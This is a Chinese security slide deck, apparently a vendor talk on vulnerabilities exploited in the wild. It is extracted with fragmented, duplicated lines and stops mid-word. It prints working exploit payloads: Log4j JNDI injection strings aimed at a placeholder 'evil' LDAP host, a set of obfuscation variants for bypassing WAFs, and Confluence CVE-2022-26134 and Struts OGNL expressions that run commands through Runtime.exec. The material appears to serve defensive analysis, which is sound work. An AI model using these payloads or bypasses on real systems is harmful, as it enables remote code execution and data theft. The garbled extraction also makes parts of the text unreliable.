攻防演练季应急自救指南—0DayNDay来袭，传统防护失效下该如何破局.docxVIP

云上热点漏洞趋势洞察以及典型攻击手法拆解

目录Menu

?在野TOP漏洞

?喋喋不休的log4j

?经久不衰的表达式漏洞

?普通/不普通的SQL

?很普通的命令执行

在野TOP漏洞利用

喋喋不休的log4j

JAVA应用

JAVA应用

GET/anythingHTTP/1.1

GET/anythingHTTP/1.1Host:

User-Agent:${jndi:ldap:///evil}

${jndi:ldap:///evil}log4j-core-2.*.jar

ldap:///evil

查询ldap:///evil

LDAP

返回/exp.class

LDAP处理流程

请求/exp.class

HTTP

加载内存马class

下载内存马

注入内存马

任意命令执行敏感信息窃取

喋喋不休的log4j

千变万化的bypass

JAVA应用↓原始版本：

JAVA应用

↓

原始版本：

${jndi:ldap:///evil}

业务代码不同形式jndi:ldap字符串系统环境变量：${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:N

业务代码

不同形式jndi:ldap字符串

系统环境变量：

${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}…

nI、

nI

、

·xxWAF

大小写：

${${upper:j}${upper:n}${lower:d}i:${upper:ldap}…

log4j-

log4j-core-2.*.jar

解析结果：ldap:///evil

unicode编码：${\u006a\u006e\u0064\u0069:ldap:

unicode编码：

${\u006a\u006e\u0064\u0069:ldap:

LDAP处理流程日期：${${date:,j,}${date:,n,}${dat

LDAP处理流程

日期：

${${date:,j,}${date:,n,}${date:,d,}${date:,i,}:${date:,l,}${date:,d,}${date:,a,}${date:,p,}

系统属性：${jnd${sys:SYS_NAME:-i}:ldap:

系统属性：

${jnd${sys:SYS_NAME:-i}:ldap:

:-语法${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap:

:-语法

${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap:

…………

经久不衰的表达式漏洞

ConfluenceOGNL

ConfluenceCVE-2022-26134黑名单：java.lang.Runtime通用公开的回显型命令执行

Confluence

CVE-2022-26134

黑名单：

java.lang.Runtime

/${

(#a=@mons.io.IOUtils@toString(

@java.lang.Runtime@getRuntime().exec(id).getInputStream(),utf-8)

)

.

(@com.opensymphony.webwork.ServletActionContext

@getResponse().setHeader(X-Cmd-Response,#a)

)

}/

(#context=#attr[struts.valueStack].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).

(#context=#attr[struts.valueStack].context).

(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec(‘id))

struts

SpringBootSpELS2-001/003/008/…061/066

SpringBootSpEL

path=/functionRouter

data=xxxheaders={

spring.cloud.fu